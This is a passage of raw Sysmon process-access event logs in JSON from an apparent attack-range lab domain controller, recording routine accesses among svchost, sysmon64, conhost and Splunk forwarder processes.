C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-00100B440500}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-00100B440500}","TargetProcessId":"4276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.702\r\nSourceProcessGUID: {41C8662E-1FF0-5F25-0000-00100B440500}\r\nSourceProcessId: 4276\r\nSourceThreadId: 4260\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.702","SourceProcessGUID":"{41C8662E-1FF0-5F25-0000-00100B440500}","SourceProcessId":"4276","SourceThreadId":"4260","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 